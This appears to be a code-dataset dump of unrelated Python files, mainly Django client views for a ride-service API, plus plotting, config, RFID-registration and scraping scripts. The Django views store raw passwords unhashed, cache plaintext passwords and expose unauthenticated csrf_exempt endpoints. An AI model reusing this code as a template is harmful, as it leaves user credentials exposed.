"terence92/covid-19", "sub_path": "prova.py", "file_name": "prova.py", "file_ext": "py", "file_size_in_byte": 6228, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "streamlit.title", "line_number": 23, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 25, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 41, "usage_type": "call"}, {"api_name": "plotly.express.bar", "line_number": 44, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 44, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 48, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.pie", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 51, "usage_type": "name"}, {"api_name": "streamlit.pyplot", "line_number": 53, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 59, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 62, "usage_type": "call"}, {"api_name": "pandas.read_excel", "line_number": 65, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 68, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 70, "usage_type": "call"}, {"api_name": "streamlit.dataframe", "line_number": 80, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}, {"api_name": "seaborn.set_style", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 88, "usage_type": "name"}, {"api_name": "seaborn.kdeplot", "line_number": 89, "usage_type": "call"}, {"api_name": "streamlit.pyplot", "line_number": 90, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 102, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 102, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 103, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 103, "usage_type": "name"}, {"api_name": "plotly.express.pie", "line_number": 107, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 107, "usage_type": "name"}, {"api_name": "streamlit.pyplot", "line_number": 115, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 138, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 155, "usage_type": "call"}, {"api_name": "plotly.express.bar", "line_number": 157, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 157, "usage_type": "name"}, {"api_name": "streamlit.pyplot", "line_number": 161, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 169, "usage_type": "call"}, {"api_name": "plotly.express.bar", "line_number": 171, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 171, "usage_type": "name"}, {"api_name": "streamlit.pyplot", "line_number": 175, "usage_type": "call"}]} +{"seq_id": "35330654963", "text": "\n\n# Create your views here.\nfrom django.shortcuts import render\nfrom .models import Client,Saldo,Calificacion\nfrom drivers.models import Driver \nfrom django.http.response import JsonResponse\nfrom django.utils.decorators import method_decorator\nfrom django.views.decorators.csrf import csrf_exempt\nimport json\nfrom django.db.models import Sum,Avg,Count\nfrom django.views import View\nfrom django.views.generic import CreateView,ListView\nfrom .forms import ClientForm\nfrom serveces.models import Services\nfrom datetime import datetime \n#importar reverse\nfrom django.urls import reverse\nfrom rest_framework.authtoken.models import Token\nfrom django.contrib.auth.models import User\n# importar cache\nfrom django.core.cache import cache\n\n\n\n\n# Create your views here.\n\nclass Clientes(View):\n @method_decorator(csrf_exempt)\n def dispatch(self, request, *args, **kwargs):\n return super().dispatch(request, *args, **kwargs)\n\n def get(self,request,id):\n listpop=[\"id\",\"token\",\"identification\",\"genero\",\"email\",\"imgcc\",\"tel\"]\n clientes=list(Client.objects.filter(pk=id).values())\n for i in listpop:\n clientes[0].pop(i)\n calificacion=Calificacion.objects.filter(usuario=id).aggregate(Avg('calificaciones'))#consulta la calificacion del cliente\n calificacion2=Calificacion.objects.filter(usuario=id).aggregate(Count('calificaciones'))\n if calificacion['calificaciones__avg']==None:\n clientes[0]['calificacion']=0\n clientes[0]['viajes']=0\n\n else: \n clientes[0]['calificacion']=calificacion.get('calificaciones__avg')\n clientes[0]['viajes']=calificacion2.get('calificaciones__count')\n saldo1=Saldo.objects.filter(usuario=id).aggregate(Sum(\"saldo\"))\n clientes[0][\"saldo\"]=saldo1.get('saldo__sum')\n isDriver=Driver.objects.filter(persona=id).exists()\n print(clientes)\n datos={'clients':clientes,\"conductor\":isDriver}\n print(clientes)\n return JsonResponse(datos)\n\n def post(self,request,id):\n cl=(request.POST)\n correo=cl[\"correo\"]\n token1=cl[\"token\"]\n iden=cl[\"identification\"]\n print(correo)\n imgen=request.FILES\n imgen=imgen[\"imagen\"]\n print(imgen)\n cliente=Client.objects.create(token=token1,identification=iden,name=cl[\"name\"],lastname=cl[\"lastname\"],genero=cl[\"genero\"],email=cl[\"correo\"],img=imgen,tel=cl[\"telefono\"])\n Token.objects.create(user=cliente)\n datos={\"cliente\":\"tegistrado\"}\n print('cliente no existe')\n \n return JsonResponse(datos)\n\n \n\nclass ClientCreateView(CreateView):\n model = Client\n template_name = \"add_clients.html\"\n form_class=ClientForm\n \n def post(self, request) :\n print(\"=====================================post =============================\")\n cliente_form=(request.POST)\n cliente_form_files=(request.FILES)\n \n usuario=User.objects.get_or_create(username=cliente_form[\"email\"],password=cliente_form[\"password\"],email=cliente_form[\"email\"])\n usuario=User.objects.get(username=cliente_form[\"email\"])\n try:\n Token.objects.get_or_create(user=usuario)\n except(KeyError,Client.DoesNotExist):\n print(\"error\",KeyError,Client.DoesNotExist)\n cliente=Client.objects.filter(email=cliente_form[\"email\"])\n if cliente:\n print(\"cliente ya existe\")\n return render(request, 'bienvenido.html', {'bienvenido': 'ya estas registrado'})\n cliente=Client.objects.create(identification=cliente_form[\"identification\"],name=cliente_form[\"name\"],lastname=cliente_form[\"lastname\"],genero=cliente_form[\"genero\"],email=cliente_form[\"email\"],img=cliente_form_files[\"img\"],tel=cliente_form[\"tel\"],usuario=usuario)\n cache.set(usuario,cliente_form[\"password\"])\n print (\"==========end post============\")\n return render(request, 'bienvenido.html', {'bienvenido': 'Bienvenid@'})\n \n\nclass ClientDriverCreateView(CreateView):\n model = Client\n template_name = \"add_clients.html\"\n form_class=ClientForm\n\n # funcion para guardar el cliente\n def form_valid(self, form):\n print(form,\"======================\")\n form.save()\n return super().form_valid(form)\n\n # funcion para redireccionar a la pagina de inicio\n def get_success_url(self):\n return reverse('drivers:adddriver')\n\n\nclass ClientesInfo(View):\n @method_decorator(csrf_exempt)\n def dispatch(self, request, *args, **kwargs):\n return super().dispatch(request, *args, **kwargs)\n\n def post(self,request):\n ci=json.loads(request.body)\n listpop=[\"token\",\"identification\",\"genero\",\"email\",\"imgcc\"]\n clientes=list(Client.objects.filter(email=ci[\"correo\"]).values())\n print(clientes,\"=====================\")\n idcli=clientes[0][\"id\"]\n for i in listpop:\n clientes[0].pop(i)\n calificacion=Calificacion.objects.filter(usuario=idcli).aggregate(Avg('calificaciones'))#consulta la calificacion del cliente\n calificacion2=Calificacion.objects.filter(usuario=idcli).aggregate(Count('calificaciones'))\n saldo1=Saldo.objects.filter(usuario=idcli).aggregate(Sum(\"saldo\"))\n if calificacion['calificaciones__avg']==None:\n clientes[0]['calificacion']=0.0\n clientes[0]['viajes']=0\n\n else: \n clientes[0]['calificacion']=calificacion.get('calificaciones__avg')\n clientes[0]['viajes']=calificacion2.get('calificaciones__count')\n \n if saldo1['saldo__sum']==None:\n clientes[0][\"saldo\"]=0\n else:\n clientes[0][\"saldo\"]=saldo1.get('saldo__sum')\n isDriver=Driver.objects.filter(persona=idcli).exists()\n print(clientes)\n datos={'clients':clientes,\"conductor\":isDriver}\n print(clientes)\n return JsonResponse(datos)\n\n \n\nclass ClientesCalification(View):\n @method_decorator(csrf_exempt)\n def dispatch(self, request, *args, **kwargs):\n return super().dispatch(request, *args, **kwargs)\n\n def post(self,request):\n cc=json.loads(request.body)\n ahora=datetime.now()\n if cc[\"rol\"]==\"condutor\":\n Calificacion.objects.create(usuario=Client.objects.get(pk=cc[\"id\"]),calificaciones=cc[\"calificacion\"],comentario=cc[\"comentario\"])\n servicio=Services.objects.filter(tpedido=cc[\"hora\"]).update(tterminado=ahora)\n print(servicio)\n #Saldo.objects.create(usuario=Client.objects.get(pk=cc[\"mi_id\"]),saldo=cc[\"precio\"],frecarga=ahora)\n else:\n Calificacion.objects.create(usuario=Client.objects.get(pk=cc[\"id\"]),calificaciones=cc[\"calificacion\"],comentario=cc[\"comentario\"])\n \"\"\"if cc[\"pago\"]==\"efectivo\":\n return JsonResponse({\"succes\":\"succes\"})\n else:\n Saldo.objects.create(usuario=Client.objects.get(pk=cc[\"mi_id\"]),saldo=-cc[\"precio\"],frecarga=ahora)\"\"\" \n return JsonResponse({\"calificacion\":\"calificado\"})\n\nclass ClientesNotification(View):\n @method_decorator(csrf_exempt)\n def dispatch(self, request, *args, **kwargs):\n return super().dispatch(request, *args, **kwargs)\n\n def post(self,request):\n cn=json.loads(request.body)\n tok=Client.objects.get(pk=cn[\"id\"])\n tok.tokenNotifi=cn[\"tokenN\"]\n tok.save()\n return JsonResponse({'token':'se agrego el token'})\n\n\n# crear vista para ingresar conductores\n\nclass ClientList(ListView):\n model = Client\n template_name = \"list_clients.html\"\n context_object_name = \"clients\"\n \n def get_queryset(self):\n today=datetime.now()\n # obtener ultima fecha en la que se recargo el saldo\n fecha_recarga= Saldo.objects.all().latest('frecarga')\n print(fecha_recarga)\n return Client.objects.all()\n\n\"\"\"class AddClientes(View):\n @method_decorator(csrf_exempt)\n def dispatch(self, request, *args, **kwargs):\n return super().dispatch(request, *args, **kwargs)\n\n def post(self,request):\n ac=json.loads(request.body)\n Client.objects.create(token= ,identification= ,name= ,lastname= ,genero= ,email= ,)\n\"\"\"\n\n\n\n\n\n", "repo_name": "MaquiDuran2807/api-server2", "sub_path": "clients/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 8227, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.views.View", "line_number": 29, "usage_type": "name"}, {"api_name": "django.utils.decorators.method_decorator", "line_number": 30, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.csrf_exempt", "line_number": 30, "usage_type": "argument"}, {"api_name": "models.Client.objects.filter", "line_number": 36, "usage_type": "call"}, {"api_name": "models.Client.objects", "line_number": 36, "usage_type": "attribute"}, {"api_name": "models.Client", "line_number": 36, "usage_type": "name"}, {"api_name": "models.Calificacion.objects.filter", "line_number": 39, "usage_type": "call"}, {"api_name": "models.Calificacion.objects", "line_number": 39, "usage_type": "attribute"}, {"api_name": "models.Calificacion", "line_number": 39, "usage_type": "name"}, {"api_name": "django.db.models.Avg", "line_number": 39, "usage_type": "call"}, {"api_name": "models.Calificacion.objects.filter", "line_number": 40, "usage_type": "call"}, {"api_name": "models.Calificacion.objects", "line_number": 40, "usage_type": "attribute"}, {"api_name": "models.Calificacion", "line_number": 40, "usage_type": "name"}, {"api_name": "django.db.models.Count", "line_number": 40, "usage_type": "call"}, {"api_name": "models.Saldo.objects.filter", "line_number": 48, "usage_type": "call"}, {"api_name": "models.Saldo.objects", "line_number": 48, "usage_type": "attribute"}, {"api_name": "models.Saldo", "line_number": 48, "usage_type": "name"}, {"api_name": "django.db.models.Sum", "line_number": 48, "usage_type": "call"}, {"api_name": "drivers.models.Driver.objects.filter", "line_number": 50, "usage_type": "call"}, {"api_name": "drivers.models.Driver.objects", "line_number": 50, "usage_type": "attribute"}, {"api_name": "drivers.models.Driver", "line_number": 50, "usage_type": "name"}, {"api_name": "django.http.response.JsonResponse", "line_number": 54, "usage_type": "call"}, {"api_name": "models.Client.objects.create", "line_number": 65, "usage_type": "call"}, {"api_name": "models.Client.objects", "line_number": 65, "usage_type": "attribute"}, {"api_name": "models.Client", "line_number": 65, "usage_type": "name"}, {"api_name": "rest_framework.authtoken.models.Token.objects.create", "line_number": 66, "usage_type": "call"}, {"api_name": "rest_framework.authtoken.models.Token.objects", "line_number": 66, "usage_type": "attribute"}, {"api_name": "rest_framework.authtoken.models.Token", "line_number": 66, "usage_type": "name"}, {"api_name": "django.http.response.JsonResponse", "line_number": 70, "usage_type": "call"}, {"api_name": "django.views.generic.CreateView", "line_number": 74, "usage_type": "name"}, {"api_name": "models.Client", "line_number": 75, "usage_type": "name"}, {"api_name": "forms.ClientForm", "line_number": 77, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.get_or_create", "line_number": 84, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 84, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 84, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.get", "line_number": 85, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 85, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 85, "usage_type": "name"}, {"api_name": "rest_framework.authtoken.models.Token.objects.get_or_create", "line_number": 87, "usage_type": "call"}, {"api_name": "rest_framework.authtoken.models.Token.objects", "line_number": 87, "usage_type": "attribute"}, {"api_name": "rest_framework.authtoken.models.Token", "line_number": 87, "usage_type": "name"}, {"api_name": "models.Client.DoesNotExist", "line_number": 88, "usage_type": "attribute"}, {"api_name": "models.Client", "line_number": 88, "usage_type": "name"}, {"api_name": "models.Client.DoesNotExist", "line_number": 89, "usage_type": "attribute"}, {"api_name": "models.Client", "line_number": 89, "usage_type": "name"}, {"api_name": "models.Client.objects.filter", "line_number": 90, "usage_type": "call"}, {"api_name": "models.Client.objects", "line_number": 90, "usage_type": "attribute"}, {"api_name": "models.Client", "line_number": 90, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 93, "usage_type": "call"}, {"api_name": "models.Client.objects.create", "line_number": 94, "usage_type": "call"}, {"api_name": "models.Client.objects", "line_number": 94, "usage_type": "attribute"}, {"api_name": "models.Client", "line_number": 94, "usage_type": "name"}, {"api_name": "django.core.cache.cache.set", "line_number": 95, "usage_type": "call"}, {"api_name": "django.core.cache.cache", "line_number": 95, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 97, "usage_type": "call"}, {"api_name": "django.views.generic.CreateView", "line_number": 100, "usage_type": "name"}, {"api_name": "models.Client", "line_number": 101, "usage_type": "name"}, {"api_name": "forms.ClientForm", "line_number": 103, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 113, "usage_type": "call"}, {"api_name": "django.views.View", "line_number": 116, "usage_type": "name"}, {"api_name": "django.utils.decorators.method_decorator", "line_number": 117, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.csrf_exempt", "line_number": 117, "usage_type": "argument"}, {"api_name": "json.loads", "line_number": 122, "usage_type": "call"}, {"api_name": "models.Client.objects.filter", "line_number": 124, "usage_type": "call"}, {"api_name": "models.Client.objects", "line_number": 124, "usage_type": "attribute"}, {"api_name": "models.Client", "line_number": 124, "usage_type": "name"}, {"api_name": "models.Calificacion.objects.filter", "line_number": 129, "usage_type": "call"}, {"api_name": "models.Calificacion.objects", "line_number": 129, "usage_type": "attribute"}, {"api_name": "models.Calificacion", "line_number": 129, "usage_type": "name"}, {"api_name": "django.db.models.Avg", "line_number": 129, "usage_type": "call"}, {"api_name": "models.Calificacion.objects.filter", "line_number": 130, "usage_type": "call"}, {"api_name": "models.Calificacion.objects", "line_number": 130, "usage_type": "attribute"}, {"api_name": "models.Calificacion", "line_number": 130, "usage_type": "name"}, {"api_name": "django.db.models.Count", "line_number": 130, "usage_type": "call"}, {"api_name": "models.Saldo.objects.filter", "line_number": 131, "usage_type": "call"}, {"api_name": "models.Saldo.objects", "line_number": 131, "usage_type": "attribute"}, {"api_name": "models.Saldo", "line_number": 131, "usage_type": "name"}, {"api_name": "django.db.models.Sum", "line_number": 131, "usage_type": "call"}, {"api_name": "drivers.models.Driver.objects.filter", "line_number": 144, "usage_type": "call"}, {"api_name": "drivers.models.Driver.objects", "line_number": 144, "usage_type": "attribute"}, {"api_name": "drivers.models.Driver", "line_number": 144, "usage_type": "name"}, {"api_name": "django.http.response.JsonResponse", "line_number": 148, "usage_type": "call"}, {"api_name": "django.views.View", "line_number": 152, "usage_type": "name"}, {"api_name": "django.utils.decorators.method_decorator", "line_number": 153, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.csrf_exempt", "line_number": 153, "usage_type": "argument"}, {"api_name": "json.loads", "line_number": 158, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 159, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 159, "usage_type": "name"}, {"api_name": "models.Calificacion.objects.create", "line_number": 161, "usage_type": "call"}, {"api_name": "models.Calificacion.objects", "line_number": 161, "usage_type": "attribute"}, {"api_name": "models.Calificacion", "line_number": 161, "usage_type": "name"}, {"api_name": "models.Client.objects.get", "line_number": 161, "usage_type": "call"}, {"api_name": "models.Client.objects", "line_number": 161, "usage_type": "attribute"}, {"api_name": "models.Client", "line_number": 161, "usage_type": "name"}, {"api_name": "serveces.models.Services.objects.filter", "line_number": 162, "usage_type": "call"}, {"api_name": "serveces.models.Services.objects", "line_number": 162, "usage_type": "attribute"}, {"api_name": "serveces.models.Services", "line_number": 162, "usage_type": "name"}, {"api_name": "models.Calificacion.objects.create", "line_number": 166, "usage_type": "call"}, {"api_name": "models.Calificacion.objects", "line_number": 166, "usage_type": "attribute"}, {"api_name": "models.Calificacion", "line_number": 166, "usage_type": "name"}, {"api_name": "models.Client.objects.get", "line_number": 166, "usage_type": "call"}, {"api_name": "models.Client.objects", "line_number": 166, "usage_type": "attribute"}, {"api_name": "models.Client", "line_number": 166, "usage_type": "name"}, {"api_name": "django.http.response.JsonResponse", "line_number": 171, "usage_type": "call"}, {"api_name": "django.views.View", "line_number": 173, "usage_type": "name"}, {"api_name": "django.utils.decorators.method_decorator", "line_number": 174, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.csrf_exempt", "line_number": 174, "usage_type": "argument"}, {"api_name": "json.loads", "line_number": 179, "usage_type": "call"}, {"api_name": "models.Client.objects.get", "line_number": 180, "usage_type": "call"}, {"api_name": "models.Client.objects", "line_number": 180, "usage_type": "attribute"}, {"api_name": "models.Client", "line_number": 180, "usage_type": "name"}, {"api_name": "django.http.response.JsonResponse", "line_number": 183, "usage_type": "call"}, {"api_name": "django.views.generic.ListView", "line_number": 188, "usage_type": "name"}, {"api_name": "models.Client", "line_number": 189, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 194, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 194, "usage_type": "name"}, {"api_name": "models.Saldo.objects.all", "line_number": 196, "usage_type": "call"}, {"api_name": "models.Saldo.objects", "line_number": 196, "usage_type": "attribute"}, {"api_name": "models.Saldo", "line_number": 196, "usage_type": "name"}, {"api_name": "models.Client.objects.all", "line_number": 198, "usage_type": "call"}, {"api_name": "models.Client.objects", "line_number": 198, "usage_type": "attribute"}, {"api_name": "models.Client", "line_number": 198, "usage_type": "name"}]} +{"seq_id": "40058429586", "text": "import os\nimport yaml\n\n\nclass Config(object):\n configs = {}\n\n def __init__(self):\n config_path = os.path.join(os.path.dirname(os.path.dirname(__file__)), \"config\")\n for item in os.listdir(config_path):\n config_file = os.path.join(config_path, item)\n config_key = item.removesuffix(\".yaml\")\n with open(config_file, mode=\"r\", encoding=\"utf-8\") as f:\n self.configs[config_key] = yaml.load(f.read(), Loader=yaml.FullLoader)\n\n @classmethod\n def get_wx_path(cls):\n self = cls()\n return self.configs[\"maotai\"].get(\"wx_path\")\n\n @classmethod\n def boot_waiting_sec(cls):\n self = cls()\n return self.configs[\"maotai\"].get(\"boot_waiting_sec\")\n\n @classmethod\n def qrcode_refresh_waiting_sec(cls):\n self = cls()\n return self.configs[\"maotai\"].get(\"qrcode_refresh_sec\")\n\n @classmethod\n def get_app_port(cls):\n self = cls()\n return self.configs[\"maotai\"].get(\"server.port\")\n", "repo_name": "woody3/flask_demo", "sub_path": "utils/configUtils.py", "file_name": "configUtils.py", "file_ext": "py", "file_size_in_byte": 1005, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.join", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 9, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "yaml.load", "line_number": 14, "usage_type": "call"}, {"api_name": "yaml.FullLoader", "line_number": 14, "usage_type": "attribute"}]} +{"seq_id": "30042526541", "text": "import plotly.offline as pyo\nimport plotly.graph_objs as go\nimport pandas as pd\n\ndf = pd.read_csv(\"data/2018WinterOlympics.csv\")\ntrace1 = go.Bar(x = df[\"Name of Counry\"],\n y = df[\"Gold\"],\n name = \"gold medals\",\n marker = {\"color\" :\"#FFD700\"})\n \ntrace2 = go.Bar(x = df[\"NOC\"],\n y = df[\"Silver\"],\n name = \"silver-medals\",\n marker=dict(color = \"#B2B9AE\"))\n\ntrace3 = go.Bar(x = df[\"NOC\"],\n y = df[\"Bronze\"],\n name = \"bronze medals\",\n marker={\"color\" : \"#8F6409\"})\n\ndata = [trace1,trace2,trace3]\n\nlayout = go.Layout(title = \"Medal Count By Country Name\",\n title_x = 0.5, barmode=\"stack\")\n\nfig = go.Figure(data = data, layout = layout)\npyo.plot(fig,filename=\"bar_chart.html\")", "repo_name": "deveshraichandani/dash", "sub_path": "bar.py", "file_name": "bar.py", "file_ext": "py", "file_size_in_byte": 837, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pandas.read_csv", "line_number": 5, "usage_type": "call"}, {"api_name": "plotly.graph_objs.Bar", "line_number": 6, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 6, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Bar", "line_number": 11, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 11, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Bar", "line_number": 16, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 16, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Layout", "line_number": 23, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 23, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Figure", "line_number": 26, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 26, "usage_type": "name"}, {"api_name": "plotly.offline.plot", "line_number": 27, "usage_type": "call"}, {"api_name": "plotly.offline", "line_number": 27, "usage_type": "name"}]} +{"seq_id": "19801494704", "text": "from typing import Protocol\n\nfrom patterns.repository import BaseRepository, IFindRepository\nfrom models import Occurrence, Vehicle\nfrom .occurrence_find import (\n OccurrenceFindRepository,\n OccurrenceFindRepositoryParams,\n)\n\n\nclass OccurrenceUpdateRepositoryParams(Protocol):\n occurrence_uuid: str\n vehicle: Vehicle\n description: str\n address_state: str\n address_city: str\n address_district: str\n address_street: str\n address_number: str\n\n\nclass OccurrenceUpdateRepository(BaseRepository):\n def update(self, params: OccurrenceUpdateRepositoryParams) -> None:\n getting_repository: IFindRepository[\n OccurrenceFindRepositoryParams, Occurrence\n ] = OccurrenceFindRepository(self.session)\n\n occurrence: Occurrence = getting_repository.find_one(params)\n\n occurrence.id_veiculo = params.vehicle.id\n occurrence.descricao = params.description\n occurrence.endereco_uf = params.address_state\n occurrence.endereco_cidade = params.address_city\n occurrence.endereco_bairro = params.address_district\n occurrence.endereco_logragouro = params.address_street\n occurrence.endereco_numero = params.address_number\n\n self.session.add(occurrence)\n", "repo_name": "VictorHenrich/projeto-seguranca-transito-backend", "sub_path": "src/repositories/occurrence/occurrence_update.py", "file_name": "occurrence_update.py", "file_ext": "py", "file_size_in_byte": 1247, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "typing.Protocol", "line_number": 11, "usage_type": "name"}, {"api_name": "models.Vehicle", "line_number": 13, "usage_type": "name"}, {"api_name": "patterns.repository.BaseRepository", "line_number": 22, "usage_type": "name"}, {"api_name": "patterns.repository.IFindRepository", "line_number": 24, "usage_type": "name"}, {"api_name": "occurrence_find.OccurrenceFindRepositoryParams", "line_number": 25, "usage_type": "name"}, {"api_name": "models.Occurrence", "line_number": 25, "usage_type": "name"}, {"api_name": "occurrence_find.OccurrenceFindRepository", "line_number": 26, "usage_type": "call"}, {"api_name": "models.Occurrence", "line_number": 28, "usage_type": "name"}]} +{"seq_id": "43866544052", "text": "from utils.classes.user import User\nfrom utils.classes.card import Card\n\nif __name__ == '__main__':\n try:\n while 1:\n \n user =User() \n card = Card()\n userInfo={}\n userInfo[\"user_name\"] = input(\"Write o user full name: \")\n userInfo[\"user_nickname\"] = input(\"Write nickname: \")\n userInfo[\"user_gender\"] = input(\"Write gender: \")\n \n while 1:\n try:\n #se nao for inteiro, vai gerar erro\n userInfo['card_id_fk'] = int( input(\"Write id card : \"))\n \n #transforma em string para ser analisado\n userInfo['card_id_fk']= str(userInfo['card_id_fk']) \n\n if not card.verify(userInfo['card_id_fk']):\n print(\"\\nCard not registered\\n\")\n \n else:\n\n if not card.verify(userInfo['card_id_fk']):\n print(\"\\nCard not registered\\n\")\n\n else: \n cardUser =(card.verifyUse(userInfo['card_id_fk']))\n\n if cardUser:\n print(\"\\nthis card is owned by \",cardUser,\". Please, write another\\n\")\n\n else:\n\n break\n except ValueError:\n print(\"\\n\\nplease, put a integer number\")\n\n \n if not userInfo[\"user_nickname\"]:\n userInfo[\"user_nickname\"] = None\n if not userInfo[\"user_gender\"]:\n userInfo[\"user_gender\"] = None\n if not userInfo[\"card_id_fk\"]:\n userInfo[\"card_id_fk\"] = None \n\n user.register(userInfo)\n print(\"User registered successfully\")\n input(\"press \\'enter\\' to register a new user\")\n\n except KeyboardInterrupt:\n print(\"\\n\\nExecution ended by user\")\n\n", "repo_name": "Batista-Gabriel/Rfid-Security-System", "sub_path": "Python/userCreation.py", "file_name": "userCreation.py", "file_ext": "py", "file_size_in_byte": 2008, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "utils.classes.user.User", "line_number": 8, "usage_type": "call"}, {"api_name": "utils.classes.card.Card", "line_number": 9, "usage_type": "call"}]} +{"seq_id": "70282961766", "text": "# faq.py \n# twizzley \n\nfrom base import Handler\nfrom model import SellModel, FeedbackModel\nfrom google.appengine.api import memcache\nfrom helper import emailme\nfrom ancestor import *\n\n\nclass FAQ(Handler):\n def get(self):\n count = memcache.get(\"TOTAL_TRANSACTED\")\n\n if count is None:\n count = 0\n\n sells = SellModel.all().ancestor(sell_key())\n for item in sells:\n count += int(item.amount)\n\n memcache.set(\"TOTAL_TRANSACTED\", count)\n\n self.render(\"faq.html\", count=count)\n\n\nclass Feedback(Handler):\n def post(self):\n feedback = self.request.get('feedback')\n FeedbackModel(parent=feedback_key(), feedback=feedback).put()\n emailme(feedback)", "repo_name": "lynhan/trademealpoints", "sub_path": "python/faq.py", "file_name": "faq.py", "file_ext": "py", "file_size_in_byte": 742, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "base.Handler", "line_number": 11, "usage_type": "name"}, {"api_name": "google.appengine.api.memcache.get", "line_number": 13, "usage_type": "call"}, {"api_name": "google.appengine.api.memcache", "line_number": 13, "usage_type": "name"}, {"api_name": "model.SellModel.all", "line_number": 18, "usage_type": "call"}, {"api_name": "model.SellModel", "line_number": 18, "usage_type": "name"}, {"api_name": "google.appengine.api.memcache.set", "line_number": 22, "usage_type": "call"}, {"api_name": "google.appengine.api.memcache", "line_number": 22, "usage_type": "name"}, {"api_name": "base.Handler", "line_number": 27, "usage_type": "name"}, {"api_name": "model.FeedbackModel", "line_number": 30, "usage_type": "call"}, {"api_name": "helper.emailme", "line_number": 31, "usage_type": "call"}]} +{"seq_id": "23686102354", "text": "import requests\nfrom bs4 import BeautifulSoup\nimport urllib.request\nimport sqlite3\n\n\nURL = 'https://us.ucoin.net/catalog/?country=ussr'\nHEADERS = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36', 'accept':'*/*'}\n\ndef get_html(url, params = None):\n r = requests.get(url, headers = HEADERS, params = params)\n return r\n\ndef get_content(html):\n soup = BeautifulSoup(html, 'html.parser')\n items = soup.find_all('table')\n with sqlite3.connect('coins.db') as db:\n cursor = db.cursor()\n cursor.execute(\"CREATE TABLE IF NOT EXISTS query (title TEXT, discriptions TEXT, image1 TEXT, image2 TEXT\"\n \"image3 TEXT, image4 TEXT, image5 TEXT, image6 TEXT, image7 TEXT, image8 